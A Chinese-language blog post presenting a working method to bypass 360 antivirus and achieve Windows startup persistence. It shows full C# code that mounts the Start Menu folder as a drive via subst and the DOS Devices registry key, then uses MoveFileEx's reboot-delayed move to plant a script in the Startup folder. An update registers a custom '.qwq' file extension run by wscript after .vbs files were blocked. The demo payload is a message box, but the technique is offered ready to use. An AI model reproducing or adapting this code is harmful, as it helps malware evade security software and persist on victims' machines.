5.8 KiB
5.8 KiB
| title | date | categories | tags | ||||
|---|---|---|---|---|---|---|---|
| 一个不太好用的过360启动方案 | 2023-2-27 17:49:45 |
|
|
突发奇想的一个思路,不太好用就发出来玩玩吧
背景知识
目录挂载
subst是Windows自带的一个工具,可以将文件目录挂载为磁盘,但是重启后不会继续挂载了。
如果想长期挂载,需要修改注册表 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices。
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/subst
MoveFileEx
MoveFileEx函数第三个参数,可以设置为MOVEFILE_DELAY_UNTIL_REBOOT,实现重启后移动文件。
此参数仅适用于同一盘符内文件的移动。
https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-movefileexa
绕过思路
shell:startup目录是用户的启动文件夹,其中的文件会在系统启动时执行,杀软也肯定对写入该目录存在监控
但是杀软无法拦截MoveFileEx导致的重启后移动,所以挂载启动文件夹为新盘符目录后通过MoveFileEx即可移动文件至启动文件夹中
Demo代码
using System;
using System.IO;
using Microsoft.Win32;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Demo
{
internal class Program
{
[Flags]
enum MoveFileFlags
{
MOVEFILE_REPLACE_EXISTING = 0x00000001,
MOVEFILE_COPY_ALLOWED = 0x00000002,
MOVEFILE_DELAY_UNTIL_REBOOT = 0x00000004,
MOVEFILE_WRITE_THROUGH = 0x00000008,
MOVEFILE_CREATE_HARDLINK = 0x00000010,
MOVEFILE_FAIL_IF_NOT_TRACKABLE = 0x00000020
}
[return: MarshalAs(UnmanagedType.Bool)]
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
static extern bool MoveFileEx(string lpExistingFileName, string lpNewFileName, MoveFileFlags dwFlags);
static void Main(string[] args)
{
File.WriteAllText("C:\\Windows\\Temp\\1.vbs", "msgbox(\"test\")");
string newdisk = "X:";
string filepath = "C:\\Windows\\Temp\\1.vbs";
string filename = "1.vbs";
string appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
string programs = appdata + "\\Microsoft\\Windows\\Start Menu\\Programs";
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Session Manager\\DOS Devices", true);
registryKey.SetValue(newdisk, "\\??\\"+ programs);
Process.Start("subst", newdisk+" \""+ programs + "\"");
File.Copy(filepath, programs+"\\"+ filename);
MoveFileEx(newdisk+ "\\" + filename, newdisk + "\\Startup\\" + filename, MoveFileFlags.MOVEFILE_DELAY_UNTIL_REBOOT);
}
}
}
2023/4/16更新
有朋友测试发现vbs后缀被拦了,懒得搞其他冷门后缀了,直接自己搞个后缀吧
using System;
using System.IO;
using Microsoft.Win32;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Demo
{
internal class Program
{
[Flags]
enum MoveFileFlags
{
MOVEFILE_REPLACE_EXISTING = 0x00000001,
MOVEFILE_COPY_ALLOWED = 0x00000002,
MOVEFILE_DELAY_UNTIL_REBOOT = 0x00000004,
MOVEFILE_WRITE_THROUGH = 0x00000008,
MOVEFILE_CREATE_HARDLINK = 0x00000010,
MOVEFILE_FAIL_IF_NOT_TRACKABLE = 0x00000020
}
public static void RegisterFileType()
{
RegistryKey softwareKey = Registry.ClassesRoot.OpenSubKey(".qwq");
if (softwareKey != null)
{
return;
}
RegistryKey fileTypeKey = Registry.ClassesRoot.CreateSubKey(".qwq");
string relationName = "QWQDANCHUN";
fileTypeKey.SetValue("", relationName);
fileTypeKey.Close();
RegistryKey relationKey = Registry.ClassesRoot.CreateSubKey(relationName);
relationKey.SetValue("", "Bypass Startup Script");
RegistryKey shellKey = relationKey.CreateSubKey("Shell");
RegistryKey openKey = shellKey.CreateSubKey("Open");
RegistryKey commandKey = openKey.CreateSubKey("Command");
commandKey.SetValue("", "wscript.exe //E:vbscript" + " \"%1\"");
relationKey.Close();
}
[return: MarshalAs(UnmanagedType.Bool)]
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
static extern bool MoveFileEx(string lpExistingFileName, string lpNewFileName, MoveFileFlags dwFlags);
static void Main(string[] args)
{
File.WriteAllText("C:\\Windows\\Temp\\test.qwq", "msgbox(\"test\")");
string newdisk = "X:";
string filepath = "C:\\Windows\\Temp\\test.qwq";
string filename = "test.qwq";
string appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
string programs = appdata + "\\Microsoft\\Windows\\Start Menu\\Programs";
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Session Manager\\DOS Devices", true);
registryKey.SetValue(newdisk, "\\??\\" + programs);
Process.Start("subst", newdisk + " \"" + programs + "\"");
File.Copy(filepath, programs + "\\" + filename);
MoveFileEx(newdisk + "\\" + filename, newdisk + "\\Startup\\" + filename, MoveFileFlags.MOVEFILE_DELAY_UNTIL_REBOOT);
RegisterFileType();
}
}
}